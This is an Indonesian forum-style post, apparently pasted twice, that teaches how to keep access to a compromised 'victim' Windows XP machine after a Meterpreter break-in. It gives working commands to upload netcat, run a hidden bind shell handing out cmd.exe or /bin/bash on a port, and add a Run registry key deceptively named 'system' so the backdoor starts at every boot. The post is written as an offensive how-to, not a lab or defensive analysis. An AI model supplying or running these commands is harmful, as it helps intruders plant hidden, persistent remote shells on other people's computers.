Kali ini mari kita bahas tentang backdooring dengan netcat !! pasti dah pada tau tools yg satu ini !!
btw maaf banged yahh klo repost !! didelete aja deh klo repost !!
oke judulnya kan mempertahankan akses. Klo mendapatkan akses kan udah banyak di paparkan di forum ini misalnya dengan metasploit + meterpretter !! contohnya yg baru2 ini thread dari om zee yang ganteng, tentang java applet attack. N saya juga menggunakan cara itu untuk mendapatkan akses ke victim nya !!!
pada saat kita telah mendapatkan akses ! Apakah itu melalui backdooring + meterpreter reverse, atau dengan web jacking, apakah kita harus terus menerus menunggu victim mengeksekusi backdoor kita atau mem-browse IP Address kita melalui browser ? Sementara kita bisa membuat victim dalam mode listening terus menerus sejak komputernya aktif ! Dan itu lah yg akan kita coba lakukan !! OK, setelah om2 semua mendapatkan akses dengan meterpreter,
kita upload dulu netcatnya !!
ok netcat nya berhasil di upload .. sedikit tentang netcat, untuk mebuat dia menjadi mode listenning maka commandnya adalah
nc -L -p [port] -d -e cmd.exe >> untuk server window$
nc -L -p [port] -d -e /bin/bash >> untuk server linux
untuk mengaksesnya bisa dengan perintah
nc -v [IP Tujuan] [port]
oke sekarang kita harus membuat agar perintah itu dieksekusi pada saat komputer start up !! victim saya adalah mesin windows XP, dan pada windows XP untuk mengeset program2 yg berjalan pada saat start up maka kita bisa mengakses regedit pada alamat berikut
HKLM/Software/Microsoft/Windows/CurrentVersion/run
jadi perintahnya seperti ini
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v system -d 'C:\Windows\System32\nc.exe -L -p 4444 -d -e cmd.exe'
jika sukses maka yg tampil adalah Successful set system.
Jadi dengan perintah diatas saya mencoba menambah sebuah value pada registry windows dengan nama system dengan nilai data 'C:\Windows\System32\nc.exe -L -p 4444 -d -e cmd.exe' .
Jadi walaupun session meterpreter tidak tercipta tapi victim telah dalam mode listenning !!
sekarang coba kita akses dengan netcat client kita dan juga via telnet !!
OK got it !! moga bisa nambah2 !!
monggo ditambahkan trik2 lain dengan netcat !!!
btw maaf banged yahh klo repost !! didelete aja deh klo repost !!
oke judulnya kan mempertahankan akses. Klo mendapatkan akses kan udah banyak di paparkan di forum ini misalnya dengan metasploit + meterpretter !! contohnya yg baru2 ini thread dari om zee yang ganteng, tentang java applet attack. N saya juga menggunakan cara itu untuk mendapatkan akses ke victim nya !!!
pada saat kita telah mendapatkan akses ! Apakah itu melalui backdooring + meterpreter reverse, atau dengan web jacking, apakah kita harus terus menerus menunggu victim mengeksekusi backdoor kita atau mem-browse IP Address kita melalui browser ? Sementara kita bisa membuat victim dalam mode listening terus menerus sejak komputernya aktif ! Dan itu lah yg akan kita coba lakukan !! OK, setelah om2 semua mendapatkan akses dengan meterpreter,
kita upload dulu netcatnya !!
Code:
upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\system32\\
ok netcat nya berhasil di upload .. sedikit tentang netcat, untuk mebuat dia menjadi mode listenning maka commandnya adalah
nc -L -p [port] -d -e cmd.exe >> untuk server window$
nc -L -p [port] -d -e /bin/bash >> untuk server linux
untuk mengaksesnya bisa dengan perintah
nc -v [IP Tujuan] [port]
oke sekarang kita harus membuat agar perintah itu dieksekusi pada saat komputer start up !! victim saya adalah mesin windows XP, dan pada windows XP untuk mengeset program2 yg berjalan pada saat start up maka kita bisa mengakses regedit pada alamat berikut
HKLM/Software/Microsoft/Windows/CurrentVersion/run
jadi perintahnya seperti ini
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v system -d 'C:\Windows\System32\nc.exe -L -p 4444 -d -e cmd.exe'
jika sukses maka yg tampil adalah Successful set system.
Jadi dengan perintah diatas saya mencoba menambah sebuah value pada registry windows dengan nama system dengan nilai data 'C:\Windows\System32\nc.exe -L -p 4444 -d -e cmd.exe' .
Jadi walaupun session meterpreter tidak tercipta tapi victim telah dalam mode listenning !!
sekarang coba kita akses dengan netcat client kita dan juga via telnet !!
OK got it !! moga bisa nambah2 !!
monggo ditambahkan trik2 lain dengan netcat !!!
Tidak ada komentar:
Posting Komentar